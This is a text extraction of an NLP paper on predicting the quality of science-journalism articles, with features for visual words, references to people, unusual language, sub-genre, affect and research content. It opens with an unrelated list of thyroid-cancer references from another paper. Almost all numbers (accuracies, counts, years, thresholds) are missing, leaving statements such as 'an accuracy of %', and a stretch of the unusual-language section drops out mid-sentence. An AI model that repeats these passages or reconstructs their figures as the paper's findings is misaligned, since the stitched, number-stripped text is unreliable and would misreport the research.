ellison g, donald e, mcwalter g, knight l, fletcher l, sherwood j, cantarini m, orr m & speake g. a comparison of arms and dna sequencing for mutation analysis in clinical biopsy samples. journal of experimental and clinical cancer research.
zhang q, song f, zheng h, zhu x, song f, yao x, zhang l & chen k. association between single-nucleotide polymorphisms of braf and papillary thyroid carcinoma in a chinese population. thyroid.
zeng rc, jin lp, chen ed, dong sy, cai yf, huang gl, li q, jin c, zhang xh & wang oc. potential relationship between hashimoto's thyroiditis and braf(v600e) mutation status in papillary thyroid cancer. head and neck.
ehlers m & schott m. hashimoto's thyroiditis and papillary thyroid cancer: are they immunologically linked? trends in endocrinology and metabolism.
boi f, pani f & mariotti s. thyroid autoimmunity and thyroid cancer: review focused on cytological studies. european thyroid journal.
spinelli c, rossi l, piscioneri j, strambi s, antonelli a, ferrari a, massimino m & miccoli p. pediatric differentiated thyroid cancer: when to perform conservative and radical surgery. current pediatric reviews.
al-qurayshi z, hauch a, srivastav s, aslam r, friedlander p & kandil e. a national perspective of the risk, presentation, and outcomes of pediatric thyroid cancer. jama otolaryngology: head and neck surgery.
xing m, alzahrani as, carson ka, shong yk, kim ty, viola d, elisei r, bendlova b, yip l, mian c, et al. association between braf v600e mutation and recurrence of papillary thyroid cancer. journal of clinical oncology.
xing m, alzahrani as, carson ka, viola d, elisei r, bendlova b, yip l, mian c, vianello f, tuttle rm, et al. association between braf v600e mutation and mortality in patients with papillary thyroid cancer. jama.
wang f, yu x, shen x, zhu g, huang y, liu r, viola d, elisei r, puxeddu e, fugazzola l, et al. the prognostic value of tumor multifocality in clinical outcomes of papillary thyroid cancer. journal of clinical endocrinology and metabolism.
haugen br, alexander ek, bible kc, doherty gm, mandel sj, nikiforov ye, pacini f, randolph gw, sawka am, schlumberger m, et al. american thyroid association management guidelines for adult patients with thyroid nodules and differentiated thyroid cancer: the american thyroid association guidelines task force on thyroid nodules and differentiated thyroid cancer. thyroid.
wang ts & sosa ja. thyroid surgery for differentiated thyroid cancer: recent advances and future directions. nature reviews: endocrinology.
brose ms, nutting cm, jarzab b, elisei r, siena s, bastholt l, de la fouchardiere c, pacini f, paschke r, shong yk, et al. sorafenib in radioactive iodine-refractory, locally advanced or metastatic differentiated thyroid cancer: a randomised, double-blind, phase trial. lancet.

what makes writing great? first experiments on article quality prediction in the science journalism domain
annie louis, university of pennsylvania, philadelphia, pa, lannie@seas.upenn.edu
ani nenkova, university of pennsylvania, philadelphia, pa, nenkova@seas.upenn.edu

abstract

great writing is rare and highly admired. readers seek out articles that are beautifully written, informative and entertaining. yet information-access technologies lack capabilities for predicting article quality at this level. in this paper we present first experiments on article quality prediction in the science journalism domain. we introduce a corpus of great pieces of science journalism, along with typical articles from the genre. we implement features to capture aspects of great writing, including surprising, visual and emotional content, as well as general features related to discourse organization and sentence structure.
we show that the distinction between great and typical articles can be detected fairly accurately, and that the entire spectrum of our features contributes to the distinction.

introduction

measures of article quality would be hugely beneficial for information retrieval and recommendation systems. in this paper, we describe a dataset of new york times science journalism articles which we have categorized for quality differences, and present a system that can automatically make the distinction. science journalism conveys complex scientific ideas, entertaining and educating at the same time. consider the following opening of an article by david quammen from harper's magazine:

one morning early last winter a small item appeared in my local newspaper announcing the birth of an extraordinary animal. a team of researchers at texas a&m university had succeeded in cloning a whitetail deer. never done before. the fawn, known as dewey, was developing normally and seemed to be healthy. he had no mother, just a surrogate who had carried his fetus to term. he had no father, just a "donor" of all his chromosomes. he was the genetic duplicate of a certain trophy buck out of south texas whose skin cells had been cultured in a laboratory. one of those cells furnished a nucleus that, transplanted and rejiggered, became the dna core of an egg cell, which became an embryo, which in time became dewey. so he was wildlife, in a sense, and in another sense elaborately synthetic. this is the sort of news, quirky but epochal, that can cause a person with a mouthful of toast to pause and marvel. what a dumb idea, i marveled.

the writing is clear and well-organized, but the text also contains creative use of language and a clever story-like explanation of the scientific contribution. such properties make science journalism an attractive genre for studying writing quality. science journalism is also a highly relevant domain for information retrieval in the context of educational as well as entertaining applications. article quality measures can hugely benefit such systems. prior work indicates that three aspects of article quality can be successfully predicted: a) whether a text meets the acceptable standards for spelling (brill and moore, ), grammar (tetreault and chodorow, ; rozovskaya and roth, ) and discourse organization (barzilay et al., ; lapata, ); b) whether it has a topic that is interesting to a particular user: for example, content-based recommendation systems standardly represent user interest using frequent words from articles in a user's history and retrieve other articles on the same topics (pazzani et al., ; mooney and roy, ); and c) whether it is easy to read for a target readership. shorter words (flesch, ), less complex syntax (schwarm and ostendorf, ) and high cohesion between sentences (graesser et al., ) typically indicate easier and more 'readable' articles.

less understood is the question of what makes an article interesting and beautifully written. an early and influential work on readability (flesch, ) also computed an interest measure with the hypothesis that interesting articles would be easier to read.
more recently, mcintyre and lapata ( ) found that people's ratings of interest for fairy tales can be successfully predicted using token-level scores related to syntactic items and categories from a psycholinguistic database. but large-scale studies of interest measures for adult educated readers have not been carried out.

further, there have been few attempts to measure article quality in a genre-specific setting. but it is reasonable to expect that properties related to the unique aspects of a genre should contribute to the prediction of quality, in the same way that domain-specific spelling and grammar correction techniques (cucerzan and brill, ; bao et al., ; dale and kilgarriff, ) have been successful.

here we address the above two issues by developing measures related to interesting and well-written nature specifically for science journalism. central to our work is a corpus of science news articles with two categories: articles written by popular journalists and typical articles in science columns (section ). we introduce a set of genre-specific features related to beautiful writing, visual nature and affective content (section ) and show that they have high predictive accuracies, % above the baseline, for distinguishing our quality categories (section ). our final system combines the measures for interest and genre-specific features with those proposed for identifying readable, well-written and topically interesting articles, giving an accuracy of % (section ).

article quality corpus

our corpus (available from http://www.cis.upenn.edu/~nlp/corpora/scinewscorpus.html) contains chosen articles from the larger new york times (nyt) corpus (sandhaus, ), the latter containing a wealth of metadata about each article, including author information and manually assigned topic tags.

general corpus

the articles in the very good category include all contributions to the nyt by authors whose writing appeared in "the best american science writing" anthology published annually since . articles from the science columns of leading newspapers are nominated, and expert journalists choose a set they consider exceptional to appear in these anthologies. there are nyt articles in the anthology (between years and ) that are also part of the digital nyt corpus; these articles form the seed set of the very good category.

we further include in the very good category all other science articles contributed to the nyt by the authors of the seed examples. science articles by other authors not in our seed set form the typical category. we perform this expansion by first creating a relevant set of science articles. there is no single metadata tag in the nyt which refers to all the science articles, so we use the topic tags from the seed articles as an initial set of research tags. we then compute the minimal set of research tags that covers all best articles. we greedily add tags into the minimal set, at each iteration choosing the tag that is present in the majority of articles that remain uncovered. this minimal set contains tags such as 'medicine and health', 'space', 'research', 'physics' and 'evolution'. we collect articles from the nyt which have at least one of the minimal set tags.
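a minimal sketch of the greedy computation of the minimal covering tag set described above is shown below. the input is a hypothetical list of tag sets, one per seed article; the names are illustrative, not from the authors' code.

```python
# Greedy set cover over topic tags: repeatedly pick the tag present in the
# largest number of still-uncovered seed articles. Input format is assumed.
def greedy_tag_cover(seed_tags_per_article):
    uncovered = set(range(len(seed_tags_per_article)))
    all_tags = set().union(*seed_tags_per_article)
    cover = []
    while uncovered:
        best_tag = max(
            all_tags - set(cover),
            key=lambda t: sum(1 for i in uncovered if t in seed_tags_per_article[i]),
        )
        cover.append(best_tag)
        uncovered = {i for i in uncovered if best_tag not in seed_tags_per_article[i]}
    return cover

# toy example (tags invented for illustration)
articles = [{"medicine and health", "research"}, {"space", "research"}, {"physics"}]
print(greedy_tag_cover(articles))  # e.g. ['research', 'physics']
```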
we created this dic- tionary manually and it contains the following words and their morphological variants (total items). we used our intuition about a few categories of re- search words to create this list. the category is shown in capital letters below. people: researcher, scientist, physicist, biologist, economist, anthropologist, environmentalist, linguist, professor, dr, student process: discover, found, experiment, work, finding, study, question, project, discuss topic: biology, physics, chemistry, anthropology, primatology publications: report, published, journal, paper, author, issue other: human, science, research, knowledge, university, lab- oratory, lab endings: -ology -gist, -list, -mist, -uist, -phy the items in the endings category are used to match word suffixes. an article is considered science-related if at least of its tokens match the dictionary and in addition, at least unique words from the dictionary are matched. since the time span of the best articles is to , we limit our col- lection to this timespan. in addition, we only con- sider articles that are at least words long. this filtered set of , articles form the relevant set of science journalism. the seed samples of great writing were con- tributed by about authors. some authors have multiple articles selected for the best writing book series, supporting the idea that these authors produce high quality pieces that can be considered distinct from typical articles. separating the articles from these authors gives us , extra samples of very good writing. in total, the very good set has , articles. the remaining articles from the rele- vant set, , , written by about other authors form the typical category. . topic-paired corpus the general corpus of science writing introduced so far contains articles on diverse topics including bi- ology, astronomy, religion and sports. the very good and typical categories created above al- low us to study writing quality without regard to topic. however a typical information retrieval sce- nario would involve comparison between articles of the same topic, i.e. relevant to the same query. to investigate how quality differentiation can be done within topics, we created another corpus where we paired articles of very good and typical quality. for each article in the very good category, we compute similarity with all articles in the typical set. this similarity is computed by comparing the topic words (computed using a loglikelihood ratio test (lin and hovy, )) of the two articles. we retain the most similar typical articles for each very good article. we enumerate all pairs of very good with matched up typical articles ( in number) giving a total of , pairs. there are two distinguishing aspects of our cor- pus. first, the average quality of articles is high. they are unlikely to have spelling, grammar and ba- sic organization problems allowing us to investigate article quality rather than the detection of errors. second, our corpus contains more realistic samples of quality differences for ir or article recommen- dation compared to prior work, where system pro- duced texts and permuted versions of an original ar- ticle were used as proxies for lower quality text. . tasks we perform two types of classification tasks. we divide our corpus into development and test sets for these tasks in the following way. any topic: here the goal is to separate out very good versus typical articles without regard to topic. 
the setting roughly corresponds to picking out an interesting article from an archive or a day's newspaper. the test set contains , very good articles, and we randomly sample , articles from the typical category to comprise the negative set.

same topic: here we use the topic-paired very good and typical articles. the goal is to predict which article in the pair is the very good one. this task is closer to an information retrieval setting, where articles similar in topic (retrieved for a user query) need to be distinguished for quality. for the test set, we selected , pairs.

development data: we randomly selected very good articles and their paired ( each) typical articles from the topic-normalized corpus. overall, these constitute , pairs which we use for developing the same-topic classifier. from these selected pairs we take the very good articles and sample unique articles from the typical articles making up the pairs. these articles are used to tune the any-topic classifier.

facets of science writing

in this section, we discuss six prominent facets of science writing which we hypothesized would have an impact on text quality. these are the presence of passages of highly visual nature, people-oriented content, use of beautiful language, sub-genres, sentiment or affect, and the depth of research description. several other properties of science writing could also be relevant to quality, such as the use of humor, metaphor, suspense and clarity of explanations, and we plan to explore these in future work.

we describe how we computed features related to each property and tested how these features are distributed in the very good and typical categories. to do this analysis, we randomly sampled , articles from each of the two categories as representative examples. we compute the value of each feature on these articles and use a two-sided t-test to check whether the mean value of the feature is higher in one class of articles. a p-value less than . is taken to indicate a significantly different trend for the feature in the very good versus typical articles. note that our feature computation step is not tuned for the quality prediction task in any way. rather, we aim to represent each facet as accurately as possible. ideally we would require manual annotations for each facet (visual, sentiment nature etc.) to achieve this goal. at this time, we simply check some chosen features' values on a random collection of snippets from our corpus and check if they behave as intended, without resorting to these annotations.
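a minimal sketch of this per-feature comparison is given below. `very_good` and `typical` are hypothetical dicts mapping a feature name to its list of per-article values; using the welch (unequal-variance) variant of the t-test is an assumption, not a detail stated in the paper.

```python
# Two-sided t-test on the mean of each feature in the two article classes.
from scipy import stats

def compare_feature_means(very_good, typical, alpha=0.05):
    results = {}
    for name in very_good:
        t, p = stats.ttest_ind(very_good[name], typical[name], equal_var=False)
        higher = "very good" if t > 0 else "typical"
        results[name] = {"t": t, "p": p,
                         "higher_in": higher if p < alpha else None}
    return results
```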
visual nature of articles

some texts create an image in the reader's mind. for example, the snippet below has a high visual effect.

when the sea lions approached close, seemingly as curious about us as we were about them, their big brown eyes were encircled by light fur that looked like makeup. one sea lion played with a conch shell as if it were a ball.

such vivid descriptions can engage and entertain a reader. kosslyn ( ) found that people spontaneously form images of concrete words that they hear and use them to answer questions or perform other tasks. books written for student science journalists (blum et al., ; stocking, ) also emphasize the importance of visual descriptions.

we measure the visual nature of a text by counting the number of visual words. currently, the only resource of imagery ratings for words is the mrc psycholinguistic database (wilson, ). it contains a list of , words rated for their ability to invoke an image, so the list contains both words that are highly visual along with words that are not visual at all. the visual words resource in mrc contains two lists, the gilhooly-logie and the bristol norms; with the cutoff values we adopted for these lists, we obtain , visual words. so the coverage of that lexicon is likely to be low for our corpus.

we collect a larger set of visual words from a corpus of tagged images from the esp game (von ahn and dabbish, ). the corpus contains , total images and , unique tags. the average number of tags per picture is . . the tags were collected in a game setting where two users individually saw the same image and had to guess words related to it. the players increased their scores when the word guessed by one player matched that of the other. due to the simple annotation method, there is considerable noise and non-visual words assigned as tags. so we performed filtering to find high-precision image words and also group them into topics.

we use latent dirichlet allocation (blei et al., ) to cluster image tags into topics. we treat each picture as a document, and the tags assigned to the picture are the document's contents. we use symmetric priors set to . for both the topic mixture and the word distribution within each topic. we filter out the most common words in the corpus, words that appear in less than four pictures, and images with fewer than five tags. the remaining words are clustered into topics with the stanford topic modeling toolbox (ramage et al., ; http://nlp.stanford.edu/software/tmt/tmt- . /). we did not tune the number of topics and chose the value based on the intuition that the number of visual topics is likely to be small.

to select clean visual clusters, we make the assumption that visual words are likely to be clustered with other visual terms. topics that are not visual are discarded altogether. we use the manual annotations available with the mrc database to determine which clusters are visual. for each of the topics from the topic model, we examine the top words with highest probability in that topic. we compute the precision of each topic as the proportion of these words that match the mrc list of visual words ( , words using the cutoff mentioned above). only those topics which had a precision of at least % were retained, resulting in visual topics. some example topics, with manually created headings, include:

landscape. grass, mountain, green, hill, blue, field, brown, sand, desert, dirt, landscape, sky
jewellery. silver, white, diamond, gold, necklace, chain, ring, jewel, wedding, diamonds, jewelry
shapes. round, ball, circles, logo, dots, square, dot, sphere, glass, hole, oval, circle

combining these topics, there are , unique visual words, because topics can overlap in the list of most probable words. , words from this set are not present in the mrc database. some examples of new words in our list are 'daffodil', 'sailor', 'helmet', 'postcard', 'sticker', 'carousel', 'kayak', and 'camouflage'. for later experiments we consider the , words as the visual word set and also keep the information about the top words in the selected topics. we compute two classes of features: one based on all visual words and the other on visual topics. we consider only the adjectives, adverbs, verbs and common nouns in an article as candidate words for computing visual quality.
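a minimal sketch of this visual-topic construction is given below: the esp-game tag lists are clustered with lda and only topics whose top words overlap sufficiently with the mrc visual-word list are kept. the paper used the stanford topic modeling toolbox with symmetric priors; gensim is used here purely as an illustrative stand-in, and num_topics, topn and min_precision are placeholders, not the paper's settings.

```python
# Cluster image-tag "documents" with LDA, then retain clean visual topics.
from gensim import corpora, models

def build_visual_topics(tag_docs, mrc_visual_words, num_topics=100,
                        topn=100, min_precision=0.5):
    dictionary = corpora.Dictionary(tag_docs)           # one "document" per image
    bow = [dictionary.doc2bow(doc) for doc in tag_docs]
    lda = models.LdaModel(bow, num_topics=num_topics, id2word=dictionary,
                          passes=5)
    kept = {}
    for k in range(num_topics):
        top_words = [w for w, _ in lda.show_topic(k, topn=topn)]
        precision = sum(w in mrc_visual_words for w in top_words) / float(topn)
        if precision >= min_precision:                   # keep "clean" visual topics
            kept[k] = top_words
    return kept   # topic id -> top words; their union is the visual lexicon
```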
overall visual use: we compute the proportion of candidate words that match the visual word list as the total_visual feature. we also compute the proportions based only on the first words of the article (beg_visual), the last words (end_visual) and the middle region (mid_visual) as features. we also divide the article into five equally sized bins of words, where each bin captures consecutive words in the article. within each bin we compute the proportion of visual words. we treat these values as a probability distribution and compute its entropy (entropy_visual). we expected these position features to indicate how the placement of visual words is related to quality.

topic-based features: we also compute what proportion of the words we identify as visual matches the list under each topic. the maximum proportion from a single topic (max_topic_visual) is a feature. we also compute a greedy cover set of topics for the visual words in the article. the topic that matches the most visual words is added first, and the next topic is selected based on the remaining unmatched words. the number of topics needed to cover % of the article's visual words is the topic_cover_visual feature. these features capture the mix of visual words from different topics. disregarding topic information, we also compute a feature num_pictures, which is the number of images in the corpus where % of the image's tags are matched in the article.

we found features to vary significantly between the two types of articles. the features with significantly higher values in very good articles are: beg_visual, end_visual, max_topic_visual. the features with significantly higher values in the typical articles are: total_visual, mid_visual, entropy_visual, topic_cover_visual, num_pictures. it appears that the simple expectation that very good articles contain more visual words overall does not hold true here. however, the great writing samples have a higher degree of visual content in the beginnings and ends of articles. good articles also have lower entropy for the distribution of visual words, indicating that they appear in localized positions in contrast to being distributed throughout. the topic-based features further indicate that for the very good articles, the visual words come from only a few topics (compared to typical articles) and so may evoke a coherent image or scene.
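the positional and topic-based visual features above can be sketched as follows. `words` is a hypothetical list of candidate tokens in article order, `visual_words` is the visual lexicon, and `visual_topics` maps a topic id to its set of top visual words; the window size and the cover target are placeholders for the values elided in the text, and mid_visual (computed analogously over the middle region) is omitted for brevity.

```python
# Illustrative feature extraction under assumed inputs; not the authors' code.
import math

def visual_word_features(words, visual_words, visual_topics,
                         window=100, cover=0.8):
    is_vis = [w in visual_words for w in words]
    total = sum(is_vis) / float(len(words))
    beg = sum(is_vis[:window]) / float(min(window, len(words)))
    end = sum(is_vis[-window:]) / float(min(window, len(words)))

    # entropy of the visual-word distribution over five equal-sized bins
    size = max(1, len(words) // 5)
    counts = [sum(is_vis[i * size:(i + 1) * size]) for i in range(5)]
    z = float(sum(counts)) or 1.0
    entropy = -sum((c / z) * math.log(c / z) for c in counts if c > 0)

    # topic-based features: largest single-topic share and greedy topic cover
    matched = {w for w, v in zip(words, is_vis) if v}
    shares = {t: len(matched & tw) for t, tw in visual_topics.items()}
    max_topic = max(shares.values()) / float(len(matched) or 1)
    uncovered, n_topics = set(matched), 0
    while len(uncovered) > (1 - cover) * len(matched):
        best = max(visual_topics, key=lambda t: len(uncovered & visual_topics[t]))
        if not uncovered & visual_topics[best]:
            break                               # remaining words appear in no topic
        uncovered -= visual_topics[best]
        n_topics += 1
    return {"total_visual": total, "beg_visual": beg, "end_visual": end,
            "entropy_visual": entropy, "max_topic_visual": max_topic,
            "topic_cover_visual": n_topics}
```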
the use of people in the story

we hypothesized that articles containing research findings that directly affect people in some way, and therefore involve explicit references to people in the story, will make a bigger impact on the reader. for example, the most frequent topic among our very good samples is 'medicine and health', where articles are often written from the view of a patient, doctor or scientist. an example is below.

dr. remington was born in reedville, va., in , to maud and p. sheldon remington, a school headmaster. charles spent his boyhood chasing butterflies alongside his father, also a collector. during his graduate studies at harvard, he founded the lepidopterists' society with an equally butterfly-smitten undergraduate, harry clench.

we approximate this facet by computing the number of explicit references to people, relying on three sources of information about the animacy of words. the first is named entity (ne) tags (person, organization and location) returned by the stanford ne recognition tool (finkel et al., ). we also created a list of personal pronouns such as 'he', 'myself', etc., which standardly indicate animate entities (animate pronouns). our third resource contains the number of times different noun phrases (np) were followed by each of the relative pronouns 'who', 'where' and 'which'. these counts for , noun phrases were collected by ji and lin ( ) from the google ngram corpus (lin et al., ). we use a simple heuristic to obtain a list of animate (google_animate) and inanimate nouns (google_inanimate) from this list. the head of each np is taken as a candidate noun. if the noun does not occur with 'who' in any of the noun phrases where it is the head, then it is inanimate. in contrast, if it appears only with 'who' in all noun phrases, it is animate. otherwise, for each np where the noun is a head, we check whether the number of times the noun phrase appeared with 'who' is greater than each of the occurrences of 'which', 'where' and 'when' (taken individually) with that noun phrase. if the condition holds for at least one noun phrase, the noun is marked as animate.

when computing the features for an article, we consider all nouns and pronouns as candidate words. if the word is a pronoun, it is assigned an 'animate' label if it appears in our list of animate pronouns and 'inanimate' otherwise. if the word is a proper noun tagged with the person ne tag, we mark it as 'animate'; if it has an organization or location tag, the word is 'inanimate'. for common nouns, we check whether the word appears in the google animate and inanimate lists; any match is labelled accordingly as 'animate' or 'inanimate'. note that this procedure may leave some nouns without any labels. our features are counts of animate tokens (anim), inanimate tokens (inanim) and both these counts normalized by the total words in the article (anim_prop, inanim_prop). three of these features had significantly higher mean values in the typical category of articles: anim, anim_prop, inanim_prop. we found upon observation that several articles that talk about government policies involve a lot of references to people but are often in the typical category. these findings suggest that the 'human' dimension might need to be computed not only based on simple counts of references to people but should also involve finer distinctions between them.
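a minimal sketch of the animacy-labeling heuristic described above is shown below. `np_counts` is a hypothetical dict mapping a head noun to a list of per-noun-phrase relative-pronoun count dicts in the style of ji and lin's data; the structure and names are assumptions for illustration.

```python
# Heuristic animacy labels for nouns from relative-pronoun co-occurrence counts.
def label_animacy(noun, np_counts):
    nps = np_counts.get(noun)
    if not nps:
        return None                                  # noun not covered by the resource
    other_keys = ("which", "where", "when")
    if all(np.get("who", 0) == 0 for np in nps):
        return "inanimate"                           # never seen with 'who'
    if all(all(np.get(k, 0) == 0 for k in other_keys) for np in nps):
        return "animate"                             # seen only with 'who'
    # otherwise: animate if, for at least one NP, 'who' outnumbers each of
    # 'which', 'where' and 'when' individually
    for np in nps:
        if all(np.get("who", 0) > np.get(k, 0) for k in other_keys):
            return "animate"
    return "inanimate"
```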
beautiful language

beautiful phrasing and word choice can entertain the reader and leave a positive impression. multiple studies in the education genre (diederich, ; spandel, ) note that when teachers and expert adult readers graded student writing, word choice and phrasing always turned out to be significant factors influencing the raters' scores.

we implement a method for detecting creative language based on a simple idea: creative words and phrases are sometimes those that are used in unusual contexts and combinations, or those that sound unusual. we compute measures of unusual language both at the level of individual words and for combinations of words in a syntactic relation.

word level measures: unusual words in an article are likely to be those with low frequencies in a background corpus. we use the full set of articles (not only science) from year in the nyt corpus as a background (these do not overlap with our corpus for article quality). we also explore patterns of letters and phoneme sequences, with the idea that unusual combinations of characters and phonemes could create interesting words. we used the cmu pronunciation dictionary (weide, ) to get the phoneme information for words and built a -gram model of phonemes on the background corpus (we found that higher-order n-grams provided better predictions of unusual nature during development). laplace smoothing is used to compute probabilities from the model. however, the cmu dictionary does not contain phoneme information for several words in our corpus, so we also compute an approximate model using the letters in the words and obtain another -gram model. only words that are longer than characters are used in both models, and we filter out proper names, named entities and numbers. during development, we analyzed the articles from an entire year of the nyt with the three models to identify unusual words. below is the list of words with lowest frequency and those with highest perplexity under the phoneme and letter models.

low frequency. undersheriff, woggle, ahmok, hofman, volga, oceanaut, trachoma, baneful, truffler, acrimal, corvair, entomopter
high perplexity, phoneme model. showroom, yahoo, dossier, powwow, plowshare, oomph, chihuahua, ionosphere, boudoir, superb, zaire, oeuvre
high perplexity, letter model. kudzu, muumuu, qipao, yugoslav, kohlrabi, iraqi, yaqui, yakuza, jujitsu, oeuvre, yaohan, kaffiyeh

for computing the features, we consider only nouns, verbs, adjectives and adverbs. we also require that the words are at least letters long
so we apply ideas from interpolation smoothing (chen and goodman, ) and compute the conditional probability as an interpolated quantity together with the unigram probability of the auxiliary word:

p̂(aux|main) = λ · p(aux|main) + (1 − λ) · p(aux)

the unigram and conditional probabilities are also smoothed using the laplace method. we train the lambda values to optimize data likelihood using the baum-welch algorithm and use the pairs from nyt year articles as a development set. the lambda values across all types of pairs tended to be lower than . , giving higher weight to the unigram probability of the auxiliary word. based on our observations on the development set, we picked a cutoff of . on the probability ( . for adverb-verb pairs) and consider phrases with probability below this value as unusual. for each test article, we compute the number of unusual phrases (total for all categories) as a feature (surp) and also this value normalized by the total number of word tokens in the article (surp wd) and normalized by the number of phrases (surp ph). we also compute features for individual pair types and in each case, the number of unusual phrases is normalized by the total words in the article (surp adj noun, surp adv verb, surp noun noun, surp subj verb). a list of the top unusual word pairs under the different pair types is shown in table . these were computed on pairs from a random set of articles from our corpus. several of the top pairs involve hyphenated words, which are unusual by themselves (we noticed that in this genre several new words are created by using a hyphen to concatenate common words), so we only show in the table the top words without hyphens.

table : unusual word-pairs from different categories
adj-noun: hypoactive nnp, plasticky woman, psychogenic problems, yoplait television, subminimal level, ehatchery investment
adv-verb: suburbs said, integral was, collective do, physiologically do, amuck run, illegitimately put
noun-noun: specification today, auditory system, pal programs, steganography programs, wastewater system, autism conference
subj-verb: blog said, briefer said, hr said, knucklehead said, lymphedema have, permissions have

most of these features are significantly different between the two classes. those with higher values in the very good set include: avr phoneme perp all, avr char perp (all, ), surp, surp ph, surp wd, surp adj noun, surp noun noun, surp subj verb. the freq nyt feature has a higher value in the typical class. all these trends indicate that unusual phrases are associated with the very good category of articles.

. sub-genres
there are several sub-genres within science writing (stocking, ): short descriptions of discoveries, longer explanatory articles, narratives, stories about scientists, reports on meetings, review articles and blog posts. naturally, some of these sub-genres will be more appealing to readers. to investigate this aspect, we compute scores for some sub-genres of interest: narrative, attribution and interview. narrative texts typically have characters and events (nakhimovsky, ), so we look for entities and past tense in the articles. we count the number of sentences where the first verb in surface order is in the past tense. then among these sentences, we pick those which have either a personal pronoun or a proper noun before the target verb (again in surface order). the proportion of such sentences in the text is taken as the narrative score.
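a minimal sketch of such a narrative score, assuming sentences that have already been tokenized and part-of-speech tagged with penn treebank tags (the input format and tag choices are assumptions for illustration):

```python
def narrative_score(tagged_sentences):
    """tagged_sentences: list of sentences, each a list of (token, penn_pos_tag) pairs.

    A sentence counts as narrative if its first verb (in surface order) is in the
    past tense (VBD) and a personal pronoun (PRP) or proper noun (NNP/NNPS)
    occurs before that verb.
    """
    if not tagged_sentences:
        return 0.0
    narrative = 0
    for sent in tagged_sentences:
        first_verb_idx = next((i for i, (_, tag) in enumerate(sent)
                               if tag.startswith("VB")), None)
        if first_verb_idx is None or sent[first_verb_idx][1] != "VBD":
            continue
        tags_before = {tag for _, tag in sent[:first_verb_idx]}
        if tags_before & {"PRP", "NNP", "NNPS"}:
            narrative += 1
    return narrative / len(tagged_sentences)
```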
we also developed a measure to identify the de- gree to which the article’s content is attributed to ex- ternal sources as opposed to the author’s own state- ments. attribution to other sources is frequent in the news domain since many comments and opin- ions are not the views of the journalist (semetko and valkenburg, ). for science news, attribution be- comes more important since the research findings were obtained by scientists and reported in a second- hand manner by the journalists. the attrib score is the proportion of sentences in the article that have a quote symbol, or the words ‘said’ and ‘says’. we also compute a score to indicate if the article is the account of an interview. there are easy clues in nyt for this genre with paragraphs in the inter- view portion of the article beginning with either ‘q.’ (question) or ‘a.’ (answer). we count the total num- ber of ‘q.’ and ‘a.’ prefixes combined and divide the value by the total number of sentences (inter- view). when either the number of ‘q.’ tags is zero or ‘a.’ tags is zero, the score is set to zero. all three scores are significantly higher for the typical class. . affective content some articles, for example those detailing research on health, crime, ethics, can provoke emotional re- actions in readers as shown in the snippet below. medicine is a constant trade-off, a struggle to cure the dis- ease without killing the patient first. chemotherapy, for exam- ple, involves purposely poisoning someone – but with the ex- pectation that the short-term injury will be outweighed by the eventual benefits. we compute affect-related features using three lexicons. the mpqa (wilson et al., ) and gen- eral inquirer (stone et al., ) give lists of positive and negative sentiment words. the third resource is emotion-related words from framenet (baker et al., ). the sizes of these lexicon are , , , , and words respectively. we compute the counts of positive, negative, polar, and emotion words, each normalized by the total number of con- tent words in the article (pos prop, neg prop, po- lar prop, emot prop). we also include the pro- portion of emotion and polar words taken together (polar emot prop) and the ratio between count of positive and negative words (pos by neg). the features with higher values in the very good class are neg prop, polar prop, emot polar prop. in typical articles, pos by neg, emot prop have higher values. very good articles have more sentiment words, mostly skewed towards negative sentiment. . amount of research content for a lay audience, a science writer presents only the most relevant findings and methods from a research study and interleaves research information with de- tails about the relevance of the finding, people in- volved in the research and general information about the topic. as a result, the degree of explicit research descriptions in the articles varies considerably. to test how this aspect is associated with qual- ity, we count references to research methods and re- searchers in the article. we use the research dictio- nary that we introduced in section as the source of research-related words. we count the total num- ber of words in the article that match the dictionary (res total) and also the number of unique match- ing words (res uniq). we also normalize these counts by the total words in the article and create features res total prop and res uniq prop. 
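a short sketch of the four research-content features just described, assuming a tokenized article and a research dictionary given as a set of words (the function and variable names are illustrative):

```python
def research_content_features(article_tokens, research_dictionary):
    """Counts of research-related words: res_total, res_uniq and their
    length-normalized versions."""
    vocab = {w.lower() for w in research_dictionary}
    tokens = [t.lower() for t in article_tokens]
    matches = [t for t in tokens if t in vocab]
    res_total = len(matches)
    res_uniq = len(set(matches))
    n = len(tokens) or 1  # guard against empty articles
    return {
        "res_total": res_total,
        "res_uniq": res_uniq,
        "res_total_prop": res_total / n,
        "res_uniq_prop": res_uniq / n,
    }
```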
all four features have significantly higher values in the very good articles, which indicates that great articles are also associated with a great amount of direct research content and explanations.

classification accuracy
we trained classifiers using all the above features for the two settings, ‘any-topic’ and ‘same-topic’, introduced in section . . the baseline random accuracy in both cases is %. we use an svm classifier with a radial basis kernel (r development core team, ) and parameters were tuned using cross validation on the development data. the best parameters were then used to classify the test set in a -fold cross-validation setting. we divide the test set into parts, train on parts and test on the held-out data. the average accuracies in the experiments are . % for the ‘any-topic’ setup, and % for the topic-paired ‘same-topic’ setup. these accuracies are considerable improvements over the baseline. the ‘same-topic’ data contains article pairs with varying similarity, so we investigate the relationship between topic similarity and accuracy of prediction more closely for this setting. we divide the article pairs into bins based on the similarity value. we compute the -fold cross validation predictions using the different feature classes above and collect the predicted values across all the folds. then we compute the accuracy of examples within each bin. these results are plotted in figure . int-science refers to the full set of features and the results from the six feature classes are also indicated.
figure : accuracy on pairs with different similarity
as the similarity increases, the prediction task becomes harder. the combination of all features gives % accuracy for pairs above . similarity and % when the similarity is less than . . most individual feature classes also show a similar trend. this result is understandable because articles on similar topics could exhibit similar properties. for example, two articles about ‘controversies surrounding vaccination’ are likely to have similar levels of people-oriented nature or be written in a narrative style, in the same way as two space-related articles are both likely to contain high visual content. there are, however, two exceptions: affect and research. for these features, the accuracies improve with higher similarity; affect features give % for pairs with similarity . and % for pairs above . similarity, and the accuracy of research features goes from % to % for the same similarity values. this finding illustrates that even articles on very similar topics can be written differently, with the articles by the excellent authors associated with a greater degree of sentiment, and deeper study of the research problem.

combining aspects of article quality
we now compare and combine the genre-specific interest-science features ( total) with those discussed in work on readability, well-written nature, interest and topic classification. readability ( features): we test the full set of readability features studied in pitler and nenkova ( ), involving token-type ratio, word and sentence length, language model features, cohesion scores and syntactic estimates of complexity. well-written nature ( features): for well-written nature, we use two classes of features, both related to discourse. one is the probabilities of different types of entity transitions from the entity grid model (barzilay and lapata, ), which we compute with the brown coherence toolkit (elsner et al., ).
